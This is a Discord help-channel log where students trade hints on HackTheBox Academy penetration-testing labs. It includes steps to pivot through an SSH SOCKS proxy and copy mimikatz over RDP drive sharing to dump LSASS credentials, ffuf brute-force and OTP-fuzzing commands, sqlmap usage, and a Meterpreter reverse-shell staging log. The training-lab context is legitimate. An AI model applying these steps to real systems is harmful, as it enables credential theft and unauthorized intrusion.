#modules

1 messages · Page 457 of 1

weary crow
#

I tried checking the schema at /graphql and I can only see two things that looks interesting SecretObject and UserObject

sick stump
#

if i remember what I did, well that host you want to extract the lsass can only connect to the ubuntu host (webAdmin) , so first you can set up a dynamic port forwarding using ssh, onto that host using the -D <port> switch and then set up your proxychains.conf, and after that now you can forward the traffic now to that isolated windows host.

From there you should have credentials from the user you got, and you can connect to it through an rdp session using xfreerdp on your attack box, since it would redirect that traffic to the ubuntu host which would then redirect that traffic to that isolated windows host

The magic comes now, your issue is how would i get the lsass file to my attack box? Why dont you just use the mimikatz.exe script on that windows host, and it would view all of that for you on there. Your issue is "How would i transfer that script into that host?" heres the magic from xfreerdp, you can use the /drive:<name-of-drive> <absolute-path-of-dir-to-share> and then just access that shared folder from that windows which should contain the script, extract onto the windows host, and its BBQ chicken from there

#

It is a bit of a work-around but really nice if you handle it

fathom pendant
#

@weary crow the module is above tier 0; please don't share things like that. also if you want to paste formatted code blocks you'll need to link your htb account to the discord following #welcome instructions. I haven't done that module so I can't exactly tell you what you are or aren't doing wrong

fathom pendant
#

I suggest exploring what you've already discovered

weary crow
fathom pendant
weary crow
sullen tree
#

HI, I recently posted about my shell giving up in the gettingstarted box after tried to move in /usr/bin/php, I got a hint that it is a php shell so that's why it doesn't react to any commands beside php, now I tried php commands even commands from gtfobins, but it's the same issue, no output from php commands.

rain mirage
fathom pendant
weary crow
#

Thanks very much 🙏🏼😀

fathom pendant
#

you're one step closer to the answer; but the query types may provide useful info for what to look for combined with what you've already found

fathom pendant
weary crow
#

Okay thanks a bunch 💯

fathom pendant
#

after that it's as simple as using the query [type] {parameters} (the [type] isn't in square brackets)

mossy badger
#

Hello Guys

chrome hawk
#

They should mention it in the Logrotate section of Linux Privilege Escalation that the race condition is extremely tight and can take dozens of tries for it to finally work.

fathom pendant
#

hey @weary crow don't dm without asking; as far as the issue goes it works on my machine, maybe try on another device

weary crow
fathom pendant
#

I suggest using the document explorer then in the top-right to get an idea of how to move forward

silent basin
#

Already done. Wasn’t helpful

pliant nest
#

Ok

cyan arch
#

Yeah, I tried seclists wordlist and then manually using gpt as well, but it took a lot of guess work to finally get the color. hope the exam is not like this, not a big fan of guess work but at a point I was doubting if this was the path.

oblique plume
#

It is a content issue, not necessarily lab.

brave field
#

It won't execute due to a specific PHP function being used. Try to read source code of the pages and see what interesting information you can find.

vestal sorrel
#

Like

obtuse bramble
#

Hey

#

I need some help

vestal sorrel
#

If I could help

#

@obtuse bramble

vestal sorrel
obtuse bramble
#

Can we talk in dm

vestal sorrel
obtuse bramble
#

Why

vestal sorrel
#

Or I can use my second account to send u a dm if that fine

vestal sorrel
obtuse bramble
#

Ok

vestal sorrel
#

On this account

obtuse bramble
#

Bro can youu provide me free pentesting videos resources link beginner to advanced level because I am new in cyber

fathom pendant
#

don't dm them @obtuse bramble

#

they're one of those fake support scammers

ivory mesa
#

Yo

#

Can I get role for chatting in general

fathom pendant
#

anyway @obtuse bramble no one is really gonna do a lot of the legwork for you

vestal sorrel
fathom pendant
obtuse bramble
#

Okk

vestal sorrel
#

Then is that a issues secondly I never said I was a support team

obtuse bramble
#

Sorry for that I can't know your rules

fathom pendant
#

they've been yeeted

obtuse bramble
#

Lund la lo bhosdi valoo

fathom pendant
#

but anyway @obtuse bramble the other reason that people can't give you those resources because "beginner cybersecurity" is extremely vague

#

and "beginner" pentester is subjective

#

also this isn't #general if you want to access more of the server you'll need to link your hackthebox account to the server following the instructions in #welcome ; also @ivory mesa @obtuse bramble

worthy sorrel
#

I’ll try to help but as a beginner i should know how much you already know on the basis of that i can suggest something

worthy sorrel
#

Sure buddy

grizzled schooner
#

Does anyone have a second to maybe lend a hand in explaining part of sqlmap essentials a little better? I'm just a bit confused on how to use the --csrf-token flag, please @ with responses

fathom pendant
fathom pendant
obsidian slate
#

Where is the best place to start study cybersecurity

fathom pendant
compact patrolBOT
grizzled schooner
# fathom pendant If you have a csrf token, you supply it there

That's what I did, I captured the burp request, saved it and then tried... But it keeps doing

--csrf-token is a regular expression [y/N] N which is stopping it I think? It's saying it can't find a valid token... Not sure if I'm doing this wrong though

obsidian slate
#

Thank kyo very much is there any specific language for cybersecurity

grizzled schooner
#

Specific language meaning what? English? Sweedish? Kali Linux? C++?

fathom pendant
grizzled schooner
#

i.e --csrf-token=*

fathom pendant
#

Because this is dealing with using a request file yeah?

grizzled schooner
#

Yeah I'm just having trouble applying it, but no worries

fathom pendant
#

The * is in the request file, not in the commandline

grizzled schooner
#

Yeah it's the Bypassing Web Application Protections module - just don't want to post revealing content is all

#

Ah I may have to specify with --data let me try quick

Edit: that didn't work either lol

Edit again: Just super picky about phrasing, I'm good now

unique field
#

@fathom pendant can i get help on i need a suggestion on this -this is reg new-Web Fuzzing-Validating Findings. for given lab i tried this command -ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ
-u 'http://IP:PORT/recursive_fuzz/FUZZ'
-recursion -recursion-depth 3 -e .php -t 50 -rate 200 -mc 200,301,302,403
-o ffuf_recursive.json -of json -v . no idea if it is right

fathom pendant
#

If it doesnt work: then its likely not right. I haven't touched that module in ages

unique field
fathom pendant
unique field
fathom pendant
spark lodge
#

Hello everyone can someone help me with this Pass the Certificate
lession in Password attacks moudle , im stuck at the last question What are the contents of flag.txt on Administrator's desktop?

formal oriole
#

Did you ever figure this out?

weary crow
#

How can I figure out the injection attack on the attacking graphql module group concat

weary crow
placid edge
weary crow
#

Can someone give some clues on how to view Fields with group concat

rustic quiver
#

Trying to complete the Writing custom wordlists and rules section in the password cracking module but i'm not getting any hits is there something im missing? I've done some research but couldnt find anything

silent basin
#

Attacking Windows Credentials…..Can someone help me understand how we get minkatz onto the target system???

tiny frigate
#

It's mentioned several times in "OSINT: Corporate Recon"; will there actually ever be a module "OSINT: Staff Investigation"?

edgy lance
#

Hi all

#

Can anyone help me out

tiny frigate
#

depends entirely on your question

glossy cloak
#

having the same problem while trying to get on splunk interface for 5 days. tried changing servers (eu and us), redownloading vpn file over and over again. help please

acoustic owl
edgy lance
edgy lance
acoustic owl
tiny frigate
tiny frigate
#

I'm no sir

edgy lance
#

Ok boi

acoustic owl
edgy lance
tiny frigate
#

this server is not to support your illegal activity, as per #rules

acoustic owl
#

As mentioned, contact the local police.

#

no

edgy lance
#

Its a python code

tiny frigate
#

get lost

edgy lance
modest breach
#

hi

glossy cloak
#

hi

weary crow
#

Hey 👋🏼

#

Can I get some assistance on the attacking graphql module

rustic sage
#
  • 1 Perform MIC cracking using the attached .cap file.

Can someone help me ?

gilded radish
keen oxide
#

hello i am looking for a ctf team blueteam

tiny frigate
keen oxide
#

i didn't have access sorry

weary crow
#

Hello please can someone help with this little issue I am having

tiny frigate
tiny frigate
#

maybe just ask your question here so several people could give it a shot

weary crow
#

How can I figure out the injection attack on the attacking graphql module group concat I tried group concat( table name order by col name) from the mariadb page writeup

keen oxide
bitter wing
#

Hey would anyone be able to dm me a hint for the Password Attacks skill assessment? I'm having a hard time getting to the other internal IPs and I'd like to ask someone if I'm close and if not if they could nudge me in the right direction.

keen oxide
bitter wing
tiny frigate
#

Hope a mod sees this: isn't it weird how the three accounts above have such strange names, all joined both Discord and this server the same day, and post pseudo relevant comments that are just quotes from other users?

late bough
#

I was wondering if you still needed help for this, its a rather broken question/answer combo.

cloud urchin
#

i'm sure they're bots

fathom pendant
#

2 of them directly parroted something I said previously Sus Oh god am i being farmed for AI training data?????

tiny frigate
#

Similar accounts were popping up on the OffSec server I was told

cloud urchin
#

lol

tiny frigate
long tulip
#

Hello. Can anyone help me with some (pentest role paths) ?

lean pewter
#

Hey I'm a bit stuck on the maintenance mode attacking graphQL assessment I am able to find the injectable parameter/query and even get sql errors + the right amount of columns however my queries seem to not reflect.

#

ah nvm HAHA FOUND THE ANSWER RIGHT AFTER

proven obsidian
#

hi guys , i'm stuck at Skills Assessment - SQL Injection Fundamentals in first step , can't login , tried every possible payload still can't get it ,even sqlmap can't 🥲

candid lily
#

anyone done "Applications of AI in InfoSec" skills assessment, i keep getting 0% accuracy

echo pecan
#

...

#

10.129.2.219

#

nah

candid lily
#

@vestal wing @upper haven

#

sorry for the ping but so many people had this same issue but no solution can be found

storm elk
#

dont overthink it @candid lily

minor lantern
#

im in cli fundamentals module for windows stuck on something can anybody help me?

#

search for the file named 'waldo.txt'. ?

#

i know the command i typed is right but the cmd is not returning anything, DM me so that i can explain

eager spindle
#

Hello everyone,sorry to bother you.
In this module:"Attacking Common Applications"
section :"Attacking Tomcat"
question:"Obtain remote code execution on the http://web01.inlanefreight.local:8180/ Tomcat instance. Find and submit the contents of tomcat_flag.txt"
I already got flag via used msfvenom achieve reverser tcp.
but there is a sentence in the text:The multi/http/tomcat_mgr_upload Metasploit module can be used to automate the process shown above, but we'll leave this as an exercise for the reader.
I tried it,but don't get result.

fossil jacinth
#

@eager spindle from Rapid7's explanation about this module:
NOTE: The compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows payloads.

eager spindle
fossil jacinth
#

I noticed exploit target is "java universal" there in your pictures. Maybe it needs to be changed

long tulip
#

Anyone can help me on those?

fossil jacinth
#

Shoot

reef sonnet
#

anyone else having troubles spawning targets?

edgy marlin
#

hi everyone, i'm on module 'attacking common services - attacking smb'. based on nmap scan how can i say that the target os is linux? i don't get it.

wide dove
#

@olive fjord how did you glitch urself to number 1 global

olive fjord
#

No comment

#

leave me alone and DO NOT ping me

quiet halo
#

I'm doing password attacks - pass the ticket from Linux. In this image, why is David cached Kerberos ticket the same file as Carlos? Shouldn't they be different?

native turtle
#

hi everyone, I need help with windows evasion sa2, I have a working script that if I manualy execute it gives me a rev shell without been blocked by av or amsi but some how it goes in timeout when the bot runs

brave field
edgy marlin
quiet halo
brave field
noble spire
#

i need help

weary crow
#

Please can someone help me out with the attacking API section broken authentication

native moss
#

Can anyone know my ip address(real ip) I used VPN

wide dove
acoustic owl
#

However, this channel is about questions relating to the modules in the Academy.

#

Read and follow #welcome to gain access to better channels for questions about VPNs.

weak patrol
#

I have been working through the Windows file transfer module (Module 24), and as I was completing the second task, I kept getting an error message stating that my answer was incorrect. I have searched through many forums and also gone through walkthroughs on YouTube, and it turns out that the answer I get is the same as that of other people!
What could be the issue?

hidden ledge
#

Hello do you have any little hint for the Password Attack Skill Assessment after compromising bdavid and stom credentials ? (Btw stom credentials doesnt work idk if it's normal)

fossil jacinth
#

I am not sure about not-working creds ... However, having some working creds, what else have you obtained ? Extra access or anything.
Have you enumerated anything ?

hidden ledge
#

Yup found multiple pcap file(Pcredz did not found anything and manual search either)

fossil jacinth
#

Ah ... I remember those.
Keep on enumerating

#

When you first gain access to some endpoint, what is your methodology for initial enumeration ? @hidden ledge

hidden ledge
#

Well since stom creds did not work, I began with hwilliam. I quickly found pcap files so I looked into it. Then I looked on my home and shares manually and with some tools (Manspider). But I was pretty sure that the pcap files were not useless since we saw it in the modules but I maybe spent to much time on it. (Or maybe not)

fossil jacinth
#

Okay, so from one user you got to another.
There you found something, searched it and haven't found anything or maybe missed something inside.
What next ?

hidden ledge
#

Keep looking on pcap because it's a big one and try to understand why stom creds fails for every services and machines. Maybe also enumerate shares again. (AH I also found a file with Administrator password in plaintext but did not work either)

fossil jacinth
#

So it's highly likely that those credentials you've found are not valid.
You have spent a lot of time on pcap.
What's next ?

noble spire
#

Hello guys i need help with questions in attack common application attack tomcat there is question say you should get rce to get the flag i did everything and get the rce but i couldnt find the directory of the flag

hidden ledge
echo pecan
#

hm

fossil jacinth
weary crow
#

Hello please can I get some help on the attacking API section 4 don't the limit of the otp

weary crow
#

Hello 👋🏼

fossil jacinth
#

I haven't done that module.
Be patient, someone might be available.

grizzled schooner
#

Hey - anyone have a second to lend a hand for sqlmap essentials skill assessment? I've found the attack vector. Saved a request from burp, but everything from just --current-db to --dump -T <table name> is failing and I'm not sure why

languid fjord
#

Restricted to verified only

#

Follow guide in /verify

#

(Unlink and relink if you don’t have the role)

silk lagoon
grizzled schooner
#

yeah can't get it to work, have dump and batch, have ran through different bypasses i.e. random agent but not working. Can't even get it to return a database name

silk lagoon
#

You have dbs in there?

grizzled schooner
#

yeah I have --||dbms=mysql||

silk lagoon
#

And you’re sure is mysql ignoring that you might have misspelled dbs?

grizzled schooner
#

yeah, the info it's returning in the output is mysql

silk lagoon
#

Ok drop the question in dms

proper parrot
#

FIXED: Added --skip-ssl

weary crow
#

Hello please can I get some help on the attacking API section 4 don't the limit of the otp

jovial vine
#

Anyone having problems starting targets?

tiny frigate
weary crow
#

Can't anyone help me 😔

tiny frigate
#

Personally I don't even understand your question. "don't the limit of the otp"?

#

also, what's "section 4"?

#

you in "API Attacks"?

tiny frigate
#

Can you share a link to the section, the title, the exact question or something? I'm not feeling like browsing the entire module to find out what you're talking about

weary crow
#

I've used the suggested words list but I had no luck

reef sonnet
#

anyone doign the Windows Attacks & Defense?
stuck at PKI - ESC1
i am copy, pasting the commands provided but still getting this error with certify
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

weary crow
#

I tried using seq -w 0 9999 but I didn't get any output true just false

tiny frigate
#

hm

#

yeah looks like 4 digit otp, wordlist seems fine

#

not sure if it matters here, but make sure it's all actually 4 digits perhaps? even the ones below 1000, so 0023 etc

weary crow
#

I checked it myself

#

So I should try it again

tiny frigate
#

yeah, maybe just expired?

cunning fern
#

Mark those as spoilers please

jovial vine
#

Hi!! Quick question, in the Skills Assessment of Password Attacks, am I supposed to know the Master Password for the Password Safe?

fathom pendant
woven zenith
#

Thank you... your eye is very good.

weary crow
weary crow
errant moss
#

Hello!
I could use a hand on

Active Directory Enumeration & Attacks
Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I think I'm supposed to get the NT hash of user "bross" using "secretsdump" but I just cant get it to work. So clearly I'm misunderstanding something....

weary crow
#

an it says :

#

Server response
Code Details
Undocumented

TypeError: NetworkError when attempting to fetch resource.
Responses
Code Description Links

#

I'm wondering if it's how the response

#

the sever is not responding curl: (7) Failed to connect to 94.237.49.23 port 52205 after 192 ms: Could not connect to server

heavy slate
#

I have been stuck in this module for 3 days, if someone has time id like to discuss it, maybe he can point out my mistakes.

AI Data Attacks -> Pickles and Stenography

proven bay
zenith token
#

Can I dm someone regarding the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat section from the Cracking Passwords with Hashcat module?

weary crow
#

No

zenith token
#

What a cruel world 🙁

#

haha

#

Anyone? I think there is a mistake in the module...

weary crow
dense willow
#

Hello — I have a question about the module “Android Application Static Analysis — Reversing Hybrid Apps.”
I completed all the steps to obtain the debug keys and configured the curl command in every variation, but I always get a 401 Unauthorized / “Invalid credentials” response. I set everything up exactly as shown in the module. I also tested the POST request with Burp and installed the app on an emulator in Android Studio, but nothing works. It feels like I must have missed something — could someone please give me a hint? Or might there be a problem with the target machine? Thank you.

topaz tundra
#

Hi please I want to know if only happens to me but I noticed that there are some modules where when i use my VPN as usual I have difficulties performing the task if not able to perform at all but when I use the pwxn box I perform the task with the same command is it normal ?

cloud urchin
topaz tundra
#

yeah some times but i only spawn it up when I have some difficulties with vpn

cloud urchin
#

well it uses the same connection as the VPN so that'll cause connectivity issues

#

you want to use one or the other

topaz tundra
#

A'ight thanks

woven zenith
#

Hi All, any other way to access the victim machine other than using evil-winrm if you have kerberos ticket?

crimson moon
#

how to share screenshot here?

cloud urchin
fathom pendant
woven zenith
plain summit
#

Is this error normal?

xfreerdp /v:targetIP /u:htb-student /p:Academy_student! /dynamic-resolution
[23:45:44:716] [119494:119495] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:45:44:716] [119494:119495] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:45:44:730] [119494:119495] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:45:44:730] [119494:119495] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:45:44:730] [119494:119495] [ERROR][com.freerdp.core] - freerdp_post_connect failed

I'm using ParrotOS Pwnbox.

ocean night
crude wing
#

Could anyone help with nosql skill assessment II?

upper widget
#

so i am working on the API Attacks model Broken Authentication Section
an im stuck at the Question

Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email 'MasonJenkins@ymail.com'. Retrieve their payment options data and submit the flag.

and this is the payload that im using

ffuf -w SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords-10000.txt:PASS -u http://94.237.49.23:33237/api/v1/authentication/customers/sign-in -X POST -H 'Content-Type: application/json' -d '{"Email": "MasonJenkins@ymail.com", "Password": "PASS"}' -t 100 -fr "Invalid Credentials"

but i cant find the right credentials
what i am doing wrong?

weary crow
#

Hello everyone, please can someone help me out on the target machine for the API attacks broken authentication I think the server not getting requests

fathom pendant
weary crow
zenith token
#

Anybody out there? I would still have an open question sadglas

upper widget
#

first use the /api/v1/authentication/customers/passwords/resets/email-otps to generate the code and then fuzz for it with a list from 0 to 9999
the password should change to the one you set

#

@weary crow

vale geyser
#

Am i the only one experiences extreme slow responses from the machines in the "Web Attacks" Module

#

It takes ages for them to respond to anything

weary crow
vale geyser
#

already reset > 10 times

#

but imma try again

#

i have the feeling the website doesnt render, because the GET request to weloveiconfonts.com fails. I reset another 10 times and each of the machines has the same issue. When i proxy through burp and just drop these requests, then the website renders fine

waxen totem
vale geyser
#

I mean i will, just wanted to mention...this is a huge pain in this module

restive ermine
#

im stunned on NoSQLi Skills Assestments || please someone help

devout lily
#

How can i stop the connections? I have already run sudo killall -9 openvpn

weary crow
#

Hello 👋🏼 please can I get some help on the mass assessment on the API module

#

I created and an order but don't know what to do next

empty imp
#

How are you all connecting to the RDP machines in the CAPE path labs? I cannot connect to most of them

For example, rn I'm in the ADCS section. I can't connect to either of them.

crimson moon
#
[!] https://10.10.14.181:8443 handling request from 10.129.43.13; (UUID: 6d8l7kje) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.181:8443 handling request from 10.129.43.13; (UUID: 6d8l7kje) Staging x64 payload (204892 bytes) ...
[!] https://10.10.14.181:8443 handling request from 10.129.43.13; (UUID: 6d8l7kje) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.181:8443 -> 10.129.43.13:49679) at 2025-10-18 07:29:47 -0500

(Meterpreter 1)(C:\Windows\system32) > getuid
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
(Meterpreter 1)(C:\Windows\system32) > 
'```


How can i solve this problem of meterpreter session timing out? I tried changing to 60s but to no avail as well. Any inputs will be appreciate.d
rustic sage
#

For windows fundamentals how do I do them without the pwn box?
With the Remote Desktop Protocol?

rustic sage
#

Ty man

terse bloom
#

Web Attacks Module --> HTTP Verb Tampering. Cannot view allowed methods with curl -i -X OPTIONS http://SERVER_IP:PORT/ I get the response: HTTP/1.1 200 OK
Date: Sat, 18 Oct 2025 13:01:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
No Allowed:...

fathom pendant
rustic sage
acoustic owl
potent lance
#

What was this fix? I'm having the same problem

zenith token
tired atlas
potent lance
potent lance
fathom pendant
terse bloom
fathom pendant
zenith token
# fathom pendant you might need to use a tool like cap2hashcat to get it to be usable by hashcat

This I have done. To briefly sum it up. I wanted to solve the first Challenge which is to crack the MIC. As described in the module there are two possibilities to get the hash from the packet capture.
1: cap2hashcat online Module
2: hashcat-utils

I used both tools and received a file with two hashes (if allowed I can post it here, or give a screenshot, but not sure regarding policies).

This hash I tried to crack using the corresponding module hashcat -a 0 -m 22000 myhashes.hccapx /blabla/rockyou.txt. But hashcat is never able to actually read the hashes...

So at this point I can't see my mistake and rather assume, that something is off with the pcap.
(btw, same result for the offline version with hashcat-utils -> Furthermore when using this tool I get the message, that this tool is deprecated and is fully removed anyways by the hcxtools)

fathom pendant
zenith token
zenith token
fathom pendant
zenith token
plain summit
#

If anyone could help with this Pwnbox ParrotOS issue that would be great:

[09:20:40:537] [11249:11250] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:20:40:537] [11249:11250] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:20:40:549] [11249:11250] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:20:40:549] [11249:11250] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:20:40:549] [11249:11250] [ERROR][com.freerdp.core] - freerdp_post_connect failed

I'm using a fresh spawn of Pwnbox ParrotOS

gilded gale
#

I'm at the Windows Fundamental Module.
Trying to create a share as instructed in the module but getting timeout error whenever trying to connect with smbclient

I tried checking on windows if the server is really started using Get-Service -Name LanmanServer (ChatGPT)
And yes it is running

But still I get the timeout error, and I also tried Set-NetFirewallRule -DisplayGroup "File and Printer Sharing" -Enabled True but don't have permission to do so.

Anyone went through similar problem?

plain summit
#
Stack-Based Buffer Overflows on Windows x86 Skills Assessment

This might be broken. The other labs in the module work perfectly fine as is.

weary crow
#

Please can anyone help me 🙏🏼

cloud urchin
dense willow
#

Hello — I have a question about the module “Android Application Static Analysis — Reversing Hybrid Apps.”
I completed all the steps to obtain the debug keys and configured the curl command in every variation, but I always get a 401 Unauthorized / “Invalid credentials” response. I set everything up exactly as shown in the module. I also tested the POST request with Burp and installed the app on an emulator in Android Studio, but nothing works. It feels like I must have missed something — could someone please give me a hint? Or might there be a problem with the target machine? Thank you.

weary crow
main berry
#

Hey everyone I have a small doubt
When the subscription ends I'm i able to access the completed model and labs

cloud urchin
main berry
#

What about the labs in the module

cloud urchin
#

yes

main berry
#

Great thank you 👍

plain summit
#
Stack-Based Buffer Overflows on Windows x86 Skills Assessment

This might be broken. The other labs in the module work perfectly fine as is.

prisma sable
#

Hello all!

I'm working the API Attacks module, Section 3/13, Broken Object Level Authorization. https://academy.hackthebox.com/beta/module/268/section/3061.
I can confirm that I'm connected to the box, and the the box is up. I'm not seeing the site. I'm seeing a different previous conversation from @weary crow and others about this module.

Please roast me if I'm missing something, or let me know if there is an issue at the moment.

weary crow
humble hemlock
#

Hey, regarding (Active Directory Enum & Attack) module.
I am on the skill assessment II and noticed PowerView is not loading, I mean I transfer it with certutil and import it, but no functions work as if they don't exist.

Tried deleting and starting over but no luck. Is this by design or am I doing something wrong here ?

weary crow
fathom pendant
humble hemlock
#

Alright, FYI it's evil-winrm causing the problem

prisma sable
humble hemlock
#

Nvm me, please continue 😂

fathom pendant
#

it's like just above telnet but way below ssh

weary crow
fathom pendant
#

but mess with everything you can regarding that

weary crow
humble hemlock
#

I can't, how am I going to abuse ACL now ? T_T

#

Pffff..... I've been here all day lol

sinful tundra
#

I can't use the pwnbox on academy it says I have one open when I don't how do I download the VPN so I can use my Kali system for the module

ocean night
#

If you have a Pwnbox that's stuck or something, support can help with that

compact patrolBOT
humble hemlock
#

Me no help ? FeelsBadMan

ocean night
#

If I knew how to help, I would

#

I don't know everything

ocean night
#

If you're having an issue @humble hemlock, I'd recommend describing what you are facing in more detail, rather than just "I can't run PowerView". Any errors? Is this on a personal VM or Pwnbox? What are you trying?

#

That'll help others help you

humble hemlock
#

Oh we can go in A Lot of details trust me, just kept breef to see who's interested first 😂

ocean night
#

Well yeah.. like I said.. details help others to help you, and sometimes people get tired of drawing blood from a stone. Go in to some more details if you can, and maybe someone will recognise the issue you're facing and be able to help 🙂

#

Not suggesting you're the stone

#

Just saying, it happens more frequently than you'd think

humble hemlock
#

Yea dw about it haha

dense willow
#

@ocean night can you help me on this or do you have an idea where I could ask for some hint?

Original Question:

Hello — I have a question about the module “Android Application Static Analysis — Reversing Hybrid Apps.”
I completed all the steps to obtain the debug keys and configured the curl command in every variation, but I always get a 401 Unauthorized / “Invalid credentials” response. I set everything up exactly as shown in the module. I also tested the POST request with Burp and installed the app on an emulator in Android Studio, but nothing works. It feels like I must have missed something — could someone please give me a hint? Or might there be a problem with the target machine? Thank you.

Many thanks in advance

ocean night
dense willow
#

Okay thank you very much anyway😊

pale depot
#

hey guys
should i freak out because i can't answer this question?

#

i've also struggeled with the others but this one when i searched for the answers i found it was so complex and too many different answers can work

cloud urchin
#

That's a tough one

weary crow
manic remnant
#

Can someone help me with this question? It won’t accept “Fibre Optic Cables” or “Optic Cables.”

The question is: What type of network cable is used to transmit data over long distances with minimal signal loss?

cloud urchin
manic remnant
clever marlin
#

hello to all

#

idk if somewone can help me wiith this problem im having on intro to windows module

cloud urchin
#

Best to include the module/section/question you're on, and maybe a bit about what you're having trouble with.

nimble tangle
#

hello in the Pivoting, Tunneling, and Port Forwarding Web Server Pivoting with Rpivot exercice after launching the rpivot server and client and trying to connect to the webserver using proxychains it won't connect can someone help with that please

digital crater
#

CWEE path - Advanced SQL Injections - Skills Assessment, part 2. I'm stuck. ||Been trying to apply the PostgreSQL Extensions method. Compiled on the student testing VM Replaced single quotes with $$. Switched to lo_put with offset=pageno*2048. Not sure what else I could be missing.||

tough gate
#

Anyone completed Cross Site Scripting Module? Need to check my flag for phishing section as it is not accepted, feel free to dm. Editing this because after 5 mins then spamming the same flag it accepted it after a few attemps..

ocean night
#

Glad you got it sorted anyway.

glad ginkgo
#

Can someone help me with Windows Priv Esc/Pillaging/task2.? I've got stuck at this task

proud finch
#

i also looked at the hint, and it is pointed at http service (according to my understanding so far).

fathom pendant
#

Theres another service running that may require some ids/ips evasion to see (maybe something to do with a source port)

proud finch
#

ahhh ohk ohk

#

thanks for the hint

fathom pendant
#

Deleting bc spoilers

spiral sapphire
#

Hey Guys, I've an issue on Trust Attacks module. I can't run SpoolSample.exe for some reason. It's the same command that's given in the example. What am I doing wrong?

spiral sapphire
lusty flint
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Skills Assessment
Link: https://academy.hackthebox.com/module/158/section/1441

Hey, I have doubt regarding scanning ports on remote/internal hosts

  • I set up a Dynamic SSH SOCKS proxy as usual through the pivot host (9050 as proxy)
  • Found internal hosts by probing with the pivot host
  • However, when I scan with

proxychains nmap -A --top-ports 100 -oN scan <internal-host>
I get no open ports and when use --reason it shows no response

  • I tried guessing and gained access and checked the listening ports within the internal host
    then went back to my attack host and tried using nc to grab banners and that worked
  • After researching I tried to use -sT for TCP connect scan using nmap still did not work giving reason no-response
  • I tried changing proxy to 1080 and did not work either
river grove
digital pendant
potent linden
#

For AD Trust Skills Assessment - I’ve been stuck on the first question - any good hints to this? Feel that I’ve been going in circles, ran the bloody dog and can’t find a path- to the point that I’m now questioning my output.

digital pendant
#

during AEN its mentioned so I think thatd be one way.

digital pendant
#

nvm was burp proxy on browser being a pain

hidden parcel
#

Module: Footprinting
Section: DNS
Question: Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain

I connected to HTB through VPN, and added the target IP to etc/hosts with associated to inlanefreight.htb, then run the dig command (output on the picture). There are two FQDN:

  • root.inlanefreight.htb.
  • ns.inlanefreight.htb.
    But none of them seems to be the answer, am I doing something wrong?
digital pendant
hidden parcel
#

it worked with the ns one, is there a reason to skip the .?

digital pendant
#

I wish I knew too 😛

hidden parcel
#

understandable xd, thank you

fickle thicket
#

Hi all, need help for Advanced SQL Injections SA, i already enumerated the email but i can't enumerate the password column. any help or guidance on this? thank you very much

grand dawn
#

Having issues with this question Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer. numbered 3 in Junior cybersecurity module workflow section 5 last question please anyone

pale island
potent linden
terse bloom
#

Is it just me or public instances are really slow?

potent linden
humble hemlock
terse bloom
#

Web Attacks --> Bypassing Encoded References (IDOR). I get a completely different Burp request when I intercept for contracts. I get google host request instead of post to download.php when I clicked on contracts...

humble hemlock
#

Dm ? Or do we answer here ? Not familiar with the process here 😅

humble hemlock
#

The AD guy

grand dawn
potent linden
fickle thicket
humble hemlock
digital crater
fickle thicket
tidal basin
#

seems like the SQLMAP flag5 in attack tuning is off. the show solution gets different results than my query.

digital crater
paper vapor
#

Hello, every lab i spawn for sql injections labs crashed

pale island
mint rover
#

Hello, sorry for the late reply. That worked out!

fathom pendant
#

@cedar bridge

  1. That module is above tier 0; don't post screenshots of spoilers
  2. Use the literal word "PORT"
#

so http://sub.do.main:PORT/path/to/whatever

cedar bridge
#

Thanks @fathom pendant . I will keep this is in mind going forward. However i tried to submit with the right format you posted but for some reason this is not getting accepted.

fathom pendant
#

i just used placeholders to avoid spoilers

cedar bridge
fathom pendant
cedar bridge
fathom pendant
#

yeah, like i said it should accept http://sub.do.main:[[:digit:]]{,5}/path/to/something or something like that

#

but it doesn't, and we complain

crystal cove
#

2AM in Australia but people are avid to learn

cedar bridge
#

@fathom pendant I have a general question. When it comes to fuzzing directories or pages wordlist. We are unable to determine which wordlist actually works. The path file seems to contrary with the one in 2025 kali machine wordlist. Will this be a major issue when it comes to exam?

fathom pendant
digital pendant
#

anyone around for a poke on AEN - I want to move from the linux host to the windows host - it briefly mentions how to do it on the module text but I'm getting no where with the current output and seemingly no connections to my python server on the local host.

#

CertUtil: -URLCache command FAILED: 0x80072ee4 (WinHttp: 12004 ERROR_WINHTTP_INTERNAL_ERROR)
CertUtil: An internal error occurred in the Microsoft Windows HTTP Services

These are the errors I get too.

#

nvm fixed it. Need http:// for it to treat it as a request to the python server

plucky sigil
#

@upper haven
Module: Attacking AI - Application and System
Section: Rogue Actions

